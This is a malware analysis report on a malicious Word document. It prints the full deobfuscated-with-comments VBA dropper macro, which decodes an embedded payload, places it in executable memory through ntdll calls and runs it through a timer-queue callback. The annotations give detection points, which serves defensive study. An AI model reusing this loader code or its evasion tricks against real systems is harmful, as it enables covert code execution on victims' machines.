Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b0cb24c43c828895…

MALICIOUS

Office (OLE)

307.5 KB Created: 2018-02-12 14:05:00 Authoring application: Microsoft Office Word First seen: 2018-03-30
MD5: 0d7ba14846c51efe322878cfcc9ca9cb SHA-1: 272dd23cab2ba5b0a2d127261c942a00995d814c SHA-256: b0cb24c43c82889505b4bb29589508cb99d5c86edbb576d47e2b501491dd419e
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6467993-0'. It contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon file opening. The script's obfuscated nature and use of API calls like 'NtAllocateVirtualMemory' suggest it is designed to download and execute a secondary payload, aligning with the behavior of a dropper malware.

Heuristics 4

  • ClamAV: Doc.Dropper.Agent-6467993-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6467993-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    selfdenial
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9884 bytes
SHA-256: 2ea632ec5a61578c84d8e0988f682951bc994234a4d8c55c3a2412a58de5b8f1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Auto-execution entry point: Word runs Document_Open as soon as the document is
' opened (the OLE_VBA_DOCOPEN finding above). The only real work is the call to
' selfdenial, defined in module "degradation"; everything else is filler.
Private Sub Document_Open()
selfdenial
' 53 + 3 = 56. Pmt is VBA's built-in loan-payment function; its result is discarded,
' so this is arithmetic noise with no effect on control flow. The same pattern
' (folded constant + discarded Pmt) recurs in every module of the script.
recommendation = 53 + 3
 Pmt 0, recommendation, 12303, 28962, 2
End Sub



Attribute VB_Name = "nissan"
' Conditional-compilation guard, constant-folded: the left comparison is 700 > -220
' (always True), so selection rests only on the right-hand `< (Win64)` test, i.e.
' `Not (0 < Win64)`. NOTE(review): if Win64 is -1 on 64-bit Office, `0 < Win64` is
' False on both architectures and this non-PtrSafe branch is the one always
' selected — confirm; if so the macro can only compile in 32-bit Office.
#If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then
' colinus -> ntdll!NtAllocateVirtualMemory, 32-bit signature, native parameter order:
' ProcessHandle, *BaseAddress, ZeroBits, *RegionSize, AllocationType, Protect.
' "bichlorideByVal" is a parameter name with the ByVal keyword fused into it, so the
' 4th parameter is ByRef (which is what RegionSize needs). The Lib name carries
' trailing spaces ("Ntdll  "); presumably tolerated by the loader and intended to
' defeat exact-string matching on the library name — a useful hunting artefact.
' Used by deflect in this module to obtain an executable region for the payload.
Public Declare Function colinus _
Lib "Ntdll  " Alias _
"NtAllocateVirtualMemory" (maure As Long, dreyfus As Long, ByVal curettage As Long, bichlorideByVal As Long, iridic As Long, ByVal bgirl As Long) As Long
#End If
' deflect(after): allocates an executable region in the current process, copies the
' decoded payload into it and returns the region's base address. `after` arrives as
' a Variant holding the String that superabat returned. The two #If branches are the
' same logic typed for 64-bit (LongPtr, fijian) and 32-bit (Long, puncuality).
Function deflect(after)
' Guard folds to 700 > -220 And 0 < (Win64): the 64-bit branch.
#If (114 - 125 + 411 + 32 - 93 + 361) > ((128 - 70 + 262) - (77 - 91 + 554) * 1) And ((6 - 114 + 136) - (127 - 91 - 8)) * 2 < (Win64) Then
Dim estoppel As LongPtr
' 65 - 126 + 69 = 8 bytes, read from VarPtr(after) + 8: the data field of the VARIANT
' structure. This copies the pointer held by the Variant into estoppel.
' NOTE(review): assumes `after` carries a BSTR whose buffer is the raw payload
' (superabat returns a String built from a Byte array) — confirm against selfdenial.
countywide = 65 - 126 + 69
Dim comburent As LongPtr
Dim hampshire As LongPtr
dipsacus = VarPtr(estoppel)
bogtrotter = fijian(dipsacus, VarPtr(after) + (10 - 75 + 73), countywide)
#End If
' Mirror guard with Not: the 32-bit branch. Same read, but 58 - 23 - 31 = 4 bytes
' at offset 124 - 39 - 77 = 8.
#If (4 - 31 + 427 + 89 - 28 + 239) > ((128 - 77 + 269) - (91 - 40 + 489) * 1) And Not ((55 - 123 + 96) - (84 - 112 + 56)) * 2 < (Win64) Then
Dim estoppel As Long
countywide = 58 - 23 - 31
Dim comburent As Long
Dim hampshire As Long
dipsacus = VarPtr(estoppel)
bogtrotter = puncuality(dipsacus, VarPtr(after) + (124 - 39 - 77), countywide)
#End If
' NtAllocateVirtualMemory arguments after constant folding:
'   comburent     = 0     -> BaseAddress = NULL (kernel chooses; updated in place, ByRef)
'   hampshire     = 9839  -> RegionSize (ByRef)
'   antipsychotic = 4096  -> AllocationType 0x1000 = MEM_COMMIT
'   booze         = 64    -> Protect 0x40 = PAGE_EXECUTE_READWRITE
'   ByVal -1 / ByVal 0    -> ProcessHandle (current-process pseudo handle) / ZeroBits
' An RWX commit issued from the Office process through the ntdll stub is the main
' detection point here (hook/ETW on NtAllocateVirtualMemory with Protect = 0x40).
comburent = 42 - 112 + 70
hampshire = 18 - 84 + 9905
antipsychotic = 39 - 101 + 4158
booze = 99 - 42 + 7
commelina = colinus(ByVal (91 - 126 + 34), _
comburent, _
ByVal (36 - 66 + 30), hampshire, _
ByVal antipsychotic, _
ByVal booze)
' Copy 38 - 101 + 5946 = 5883 bytes from the payload pointer into the new region.
' 5883 = 7844 * 3 / 4, i.e. exactly the output of decoding the 7844 characters that
' selfdenial feeds to superabat. NOTE(review): on the 64-bit path the copy helper is
' fijian, yet puncuality (Long-typed) is called here regardless of branch — confirm
' whether this is intentional.
puncuality comburent, estoppel, 38 - 101 + 5946
Pmt 0, (48 + 17), 20068, 10392, 3
' Return value: base address of the executable region.
deflect = comburent
End Function


Attribute VB_Name = "mustang"
' 64-bit (PtrSafe / LongPtr) twin of the NtAllocateVirtualMemory import in module
' "nissan". The guard folds to 700 > -220 And 0 < (Win64), the mirror image (no Not)
' of the 32-bit guard, so exactly one declaration of colinus should compile per
' architecture. NOTE(review): with Win64 = -1, `0 < Win64` is False, which would mean
' this PtrSafe branch is never selected — confirm.
#If (44 - 73 + 429 + 73 - 10 + 237) > ((128 - 51 + 243) - (46 - 29 + 523) * 1) And ((128 - 45 - 55) - (99 - 71 + 0)) * 2 < (Win64) Then
Public Declare PtrSafe Function colinus _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (bridewell As LongPtr, bookmaker As LongPtr, ByVal oca As LongPtr, actualizedByVal As LongPtr, constituting As LongPtr, ByVal cock As LongPtr) As LongPtr
#End If
' rearguard -> kernel32!CreateTimerQueueTimer, 32-bit signature, every parameter
' declared As Any so any numeric can be passed: phNewTimer (ByRef), TimerQueue,
' Callback, Parameter, DueTime, Period, Flags. selfdenial calls it with Callback
' pointing into the RWX region returned by deflect, so a thread-pool timer thread
' is the execution vehicle; no CreateThread, Shell or WScript call appears in the
' listed script.
#If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then
Public Declare Function rearguard _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (bedight As Any, ByVal confine As Any, ByVal microgramma As Any, ByVal insensibly As Any, ByVal experiment As Any, ByVal maildrop As Any, ByVal leymus As Any) As Long
#End If
' superabat(cancan): converts the encoded text taken from the form control into the
' raw payload bytes. Two stages: (1) subtract a position-dependent offset from every
' byte, (2) a standard base64 decode driven by stridor's reverse table and the three
' digit-weight tables built below. All literals are constant-folded arithmetic; the
' folded values are noted inline. Declared As String, so the Byte array assigned at
' the end is returned as a String.
Public Function superabat(cancan) As String
' Weight tables for base64 digits 0..63: bawdyhouse = d*64, fixedness = d*4096,
' tightfitting = d*262144. sundowner is the output buffer (6963 bytes, larger than
' the 5883 actually produced).
Dim bawdyhouse(63) As Long
Dim sundowner(6962) As Byte
Dim chalcedony As Long
Dim samara As Long
Dim embellishment As Long
Dim tightfitting(63) As Long
Dim fixedness(63) As Long
Dim osmanthus() As Byte
Dim wotan As Long
' Folded constants: proctology = 262144 (64^3), alongside = 255 (&HFF),
' meanings = 256, direction = 4096 (64^2), qualification = 65536 (&H10000),
' cebidae = 64, evenhanded = 65280 (&HFF00), severalty = 16711680 (&HFF0000).
proctology = 11 - 58 + 262191
alongside = 70 - 72 + 257
meanings = 117 - 104 + 243
direction = 20 - 12 + 4088
qualification = 94 - 4 + 65446
cebidae = 103 - 49 + 10
evenhanded = 87 - 98 + 65291
severalty = 33 - 41 + 16711688
Dim hurl() As Byte
' 120 + 8 = 128 = vbFromUnicode: the input string as a single-byte (ANSI) Byte array.
hurl = VBA.StrConv(cancan, 120 + 8)
miserere = 1 + 59
Pmt 0, miserere, 26798, 42787, 6
' Stage 1. clamp = 7843, so bytes 0..7843 (7844 bytes) are processed — the length
' selfdenial extracts with Right(). padre = vbKeyShift (16) - 12 = 4: even positions
' have 4 subtracted, odd positions 3. This offset is what keeps the text from being
' recognisable as base64 on disk and is the key for static decoding.
clamp = 7840 + 3
padre = vbKeyShift - 12
For attendance = (3 - 3) To clamp
If attendance Mod 2 = (4 - 4) Then
hurl(attendance) = hurl(attendance) - padre
Else
hurl(attendance) = hurl(attendance) - (padre - 1)
End If
Next attendance
crumenal = 27 + 27
Pmt 0, crumenal, 9696, 24175, 6
' 256-entry base64 reverse table (ASCII -> digit value), see stridor.
backswimmer = stridor
' Loop 0 To 63; insubordinate(a, b, 47) is a * b, filling the weight tables.
For chalcedony = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
bawdyhouse(chalcedony) = insubordinate(chalcedony, cebidae, 47)
fixedness(chalcedony) = insubordinate(chalcedony, direction, 47)
tightfitting(chalcedony) = insubordinate(chalcedony, proctology, 47)
Next chalcedony
rosales = 6 + 29
Pmt 0, rosales, 39805, 48993, 7
osmanthus = hurl
arbitrament = 21 + 51
Pmt 0, arbitrament, 9930, 52430, 4
' Stage 2. christianity = 3 (index of the 4th character of a group), captivity = 4
' (unused), poohpoohpooh = 2. The loop advances 4 input characters per iteration
' (samara = samara + 3 inside, + 1 from Next) and emits 3 output bytes.
christianity = 101 - 78 - 20
captivity = christianity + 1
poohpoohpooh = 53 - 61 + 10
For samara = (2 - 2) To clamp
continuous = osmanthus(samara)
betrayer = osmanthus(samara + 2)
appliance = fixedness(backswimmer(osmanthus(samara + 1)))
transshipment = bawdyhouse(backswimmer(betrayer)) + backswimmer(osmanthus(samara + christianity))
' wotan = d0*262144 + d1*4096 + d2*64 + d3: the 24-bit value of one base64 group.
wotan = tightfitting(backswimmer(continuous)) + appliance + transshipment
' Byte split via opcode 39 (And) and 29 (integer division):
'   byte 0 = (wotan And &HFF0000) \ &H10000
'   byte 1 = (wotan And &HFF00)   \ 256
'   byte 2 =  wotan And &HFF
chalcedony = insubordinate(wotan, severalty, 39)
sundowner(embellishment) = insubordinate(chalcedony, qualification, 29)
chalcedony = insubordinate(wotan, evenhanded, 39)
sundowner(embellishment + 1) = insubordinate(chalcedony, meanings, 29)
sundowner(embellishment + poohpoohpooh) = insubordinate(wotan, alongside, 39)
embellishment = embellishment + poohpoohpooh + 1
samara = samara + 3
Next
' No '=' padding handling: the input is assumed to be a whole number of 4-character
' groups (7844 = 4 * 1961 -> 5883 output bytes).
superabat = sundowner
End Function



Attribute VB_Name = "kiario"
' 64-bit (PtrSafe) twin of the CreateTimerQueueTimer import in module "mustang";
' guard folds to 700 > -220 And 0 < (Win64). NOTE(review): with Win64 = -1 the
' comparison is False and this branch would never be selected — confirm.
#If (44 - 73 + 429 + 73 - 10 + 237) > ((128 - 51 + 243) - (46 - 29 + 523) * 1) And ((128 - 45 - 55) - (99 - 71 + 0)) * 2 < (Win64) Then
Public Declare PtrSafe Function rearguard _
Lib "Kernel32  " Alias _
"CreateTimerQueueTimer" (involute As Any, ByVal sharpcornered As Any, ByVal granicus As Any, ByVal lordosis As Any, ByVal harem As Any, ByVal corbina As Any, ByVal admeasurement As Any) As Long
#End If
' assumiing -> ntdll!NtWriteVirtualMemory, 32-bit signature, all parameters ByVal As
' Any: ProcessHandle, BaseAddress, Buffer, NumberOfBytesToWrite, NumberOfBytesWritten.
' Because the last parameter is ByVal, callers that pass a 0 Long hand the API a NULL
' NumberOfBytesWritten. Used as a generic memory-copy primitive by puncuality in this
' module (the Lib name again carries trailing spaces).
#If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then
Public Declare Function assumiing _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal machiavelism As Any, ByVal scours As Any, ByVal consciously As Any, ByVal caracolito As Any, ByVal citrulline As Any) As Long
#End If
' puncuality(dest, src, size): 32-bit memory copy within the current process using
' ntdll!NtWriteVirtualMemory (assumiing, declared in module "kiario") instead of
' RtlMoveMemory, which keeps the usual copy APIs out of the import list. deflect uses
' it both to read the payload pointer out of a Variant and to write the payload into
' the RWX region. No value is returned; the NTSTATUS is discarded.
Function puncuality(contemptible, dalea, terebinth)
Dim cyprinus As Long
Dim daffy As Long
Dim rostiferous As Long
Dim keck As Long
Dim arenaria As Long
' Self-assignment, filler.
befog = befog
' Argument shuffle: cyprinus = destination, arenaria = byte count, rostiferous = source.
cyprinus = contemptible
arenaria = terebinth
rostiferous = dalea
Pmt 0, (11 + 46), 22959, 16298, 5
' 40 - 17 - 24 = -1: the current-process pseudo handle.
daffy = 40 - 17 - 24
' NtWriteVirtualMemory(-1, cyprinus, rostiferous, arenaria, keck) with keck (0)
' passed by value, i.e. a NULL NumberOfBytesWritten.
assumiing ByVal daffy, _
cyprinus, _
rostiferous, _
arenaria, keck
End Function
' insubordinate(a, b, op): opcode-dispatched arithmetic so the decoder's operators do
' not appear literally in superabat. The selectors fold to 29, 39 and 47:
'   op 29 -> a \ b   (integer division)
'   op 39 -> a And b (bitwise And)
'   op 47 -> a * b
' Any other op leaves the return value unassigned (Empty).
Function insubordinate(maturation, blossoms, assumption)
If assumption = 29 + (10 / 2 - 5) Then
insubordinate = maturation \ blossoms
ElseIf assumption = 39 + (5 - 3) / 2 - 1 Then
insubordinate = maturation And blossoms
ElseIf assumption = 47 + (56 / 7 - 4 * 2) Then
insubordinate = maturation * blossoms
End If
End Function
' stridor(): builds the 256-entry reverse lookup table for the standard base64
' alphabet (A-Z -> 0..25, a-z -> 26..51, 0-9 -> 52..61, '+' -> 62, '/' -> 63) from
' folded arithmetic. `i` is never used inside the loops; `inevitable` is the running
' index. NOTE(review): athanor is never declared, so every `< athanor` test appears to
' be always False (Empty compares as 0) and the Exit For lines are dead — confirm.
' Each loop also runs one index past its alphabet (91, 58, 123); harmless for valid input.
Function stridor()
Dim unforgivingly(255) As Byte
' 'A' (65) .. 91: value = index - 65
inevitable = (83 - 11 - 7)
For i = (inevitable) + (1 - 1) To (41 - 81 + 131)
unforgivingly(inevitable) = inevitable - (68 - 55 + 52)
inevitable = (inevitable + 1)
If (14 - 57 + 134) < athanor Then Exit For
Next
' '0' (48) .. 58: value = index + 4
inevitable = (94 - 50 + 4)
For i = inevitable + (1 - 1) To (35 - 118 + 141)
unforgivingly(inevitable) = inevitable + (25 - 102 + 81)
inevitable = (inevitable + 1)
If (128 - 32 - 38) < athanor Then Exit For
Next
' 'a' (97) .. 123: value = index - 71
inevitable = (128 - 109 + 78)
For i = inevitable + (1 - 1) To (128 - 35 + 30)
unforgivingly(inevitable) = inevitable - (37 - 77 + 111)
inevitable = (inevitable + 1)
If (38 - 9 + 94) < athanor Then Exit For
Next
' '/' (47) -> 63
unforgivingly(53 - 49 + 43) = (17 - 70 + 116)
' '+' (43) -> 62
inevitable = (127 - 49 - 35)
unforgivingly(inevitable) = (67 - 40 + 35)
stridor = unforgivingly
End Function

Attribute VB_Name = "degradation"
' 64-bit (PtrSafe / LongPtr) twin of the NtWriteVirtualMemory import in module
' "kiario"; guard folds to 700 > -220 And 0 < (Win64). Used by fijian below.
' NOTE(review): with Win64 = -1 the comparison is False and this branch would never
' be selected — confirm.
#If (44 - 73 + 429 + 73 - 10 + 237) > ((128 - 51 + 243) - (46 - 29 + 523) * 1) And ((128 - 45 - 55) - (99 - 71 + 0)) * 2 < (Win64) Then
Public Declare PtrSafe Function assumiing _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal volgaic As Any, ByVal milliner As Any, ByVal obstinancy As Any, ByVal oemula As Any, ByVal blockhead As Any) As LongPtr
#End If
' fijian(dest, src, size): 64-bit (LongPtr) twin of puncuality — a memory copy in the
' current process via ntdll!NtWriteVirtualMemory (assumiing). deflect's 64-bit branch
' uses it to read the payload pointer out of a Variant. No return value; the NTSTATUS
' is discarded.
Function fijian(consultum, syllabically, obligate)
Dim crematorium As LongPtr
Dim nonlexically As LongPtr
Dim acidic As LongPtr
Dim illstarred As LongPtr
Dim cagliostro As LongPtr
' Argument shuffle: nonlexically = destination, cagliostro = byte count,
' illstarred = source.
nonlexically = consultum
cagliostro = obligate
illstarred = syllabically
' 23 + 40 = 63; discarded Pmt call, filler.
calcutta = 23 + 40
Pmt 0, calcutta, 29918, 36852, 4
' 112 - 79 - 34 = -1: the current-process pseudo handle.
crematorium = 112 - 79 - 34
' NtWriteVirtualMemory(-1, nonlexically, illstarred, cagliostro, acidic) with acidic
' (0) passed by value, i.e. a NULL NumberOfBytesWritten.
assumiing ByVal crematorium, _
nonlexically, _
illstarred, cagliostro, _
acidic
End Function
' selfdenial(): the main routine, reached from Document_Open. Sequence:
'   1. read the encoded payload out of the UserForm "flotsam" (control "privation"),
'   2. decode it with superabat,
'   3. allocate RWX memory and copy the bytes in (deflect),
'   4. start execution through a timer-queue callback into that memory (rearguard).
' The listed macro code performs no download and writes nothing to disk: the payload
' travels inside the document and runs in memory. What the 5883-byte payload does
' afterwards is outside the VBA.
Function selfdenial()
' Day(#12/5/2013#) = 5. Writing it to the control's Value is presumably only to force
' the form to instantiate before SelectedItem is read. NOTE(review): control type
' (exposes .Value and .SelectedItem) to be confirmed from the form binary.
flotsam.privation.Value = Day(#12/5/2013#)
' varday receives the Boolean of the comparison (combine = "occultist"), not the
' string — filler.
varday = combine = "occultist"
Set hightop = flotsam.privation.SelectedItem
bellow = 51 + 4
Pmt 0, bellow, 15482, 34112, 7
' The encoded payload is stored in the selected item's Name property; the last
' 4 - 125 + 7965 = 7844 characters are the offset-encoded base64 text superabat
' expects. For static extraction: take that suffix, undo the 4/3 offset, base64-decode.
atavistic = hightop.Name
floorcover = 4 - 125 + 7965
cassius = Right(atavistic, floorcover)
apres = superabat(cassius)
Pmt 0, (21 + 46), 38471, 17048, 4
' animism = entry-point offset into the decoded payload. Both guards fold to
' 700 > -220 And 0 < (Win64), without and with Not: 88 - 60 + 2036 = 2064 on the
' 64-bit branch, (6 - 80 + 855) + 3459 = 4240 on the 32-bit branch.
' NOTE(review): if Win64 is -1 on 64-bit Office, `0 < Win64` is False everywhere and
' only the Not (32-bit) branch is ever active — confirm.
#If (101 - 28 + 327 + 101 - 21 + 220) > ((68 - 126 + 378) - (125 - 93 + 508) * 1) And ((79 - 95 + 44) - (15 - 53 + 66)) * 2 < (Win64) Then
Dim orthoptera As LongPtr
Dim copying As LongPtr
Dim discard As LongPtr
Dim cortes As LongPtr
Dim crosslinguistic As LongPtr
animism = 88 - 60 + 2036
#End If
#If (58 - 56 + 398 + 38 - 91 + 353) > ((38 - 55 + 337) - (7 - 92 + 625) * 1) And Not ((88 - 14 - 46) - (30 - 123 + 121)) * 2 < (Win64) Then
Dim copying As Long
Dim orthoptera As Long
Dim discard As Long
Dim cortes As Long
Dim crosslinguistic As Long
animism = (6 - 80 + 855) + 3459
#End If
Pmt 0, (16 + 16), 4607, 46601, 4
philander = 22 + 41
Pmt 0, philander, 16955, 30590, 7
' orthoptera = base address of the RWX region now holding the payload.
broil = apres
orthoptera = deflect(broil)
' discard = 0; copying = callback address = base + animism; cortes starts as
' 42 - 78 + 201563 = 201527 but is an output (receives the timer handle);
' crosslinguistic = 3500 is never used.
discard = 7 - 103 + 96
copying = orthoptera + animism
cortes = 42 - 78 + 201563
crosslinguistic = 39 - 12 + 3473
' CreateTimerQueueTimer(&cortes, TimerQueue = 0 (default queue), Callback = copying,
' Parameter = 0, DueTime = 0, Period = 0, Flags = 0): the thread pool invokes the
' callback at once, which is the first native execution of the payload. A timer
' callback whose address lies in private RWX memory of an Office process is the
' behaviour to alert on (thread start address outside any loaded image).
mg = rearguard(cortes, discard, _
copying, discard, _
discard, _
discard, discard)
archipelago = 7 + 26
Pmt 0, archipelago, 25946, 57139, 5
End Function

Attribute VB_Name = "flotsam"
Attribute VB_Base = "0{8EDF9204-EC5B-4855-B1A4-EDF33C6052A7}{6AF6A7CE-C394-4C51-B2C5-59677F4C76BA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False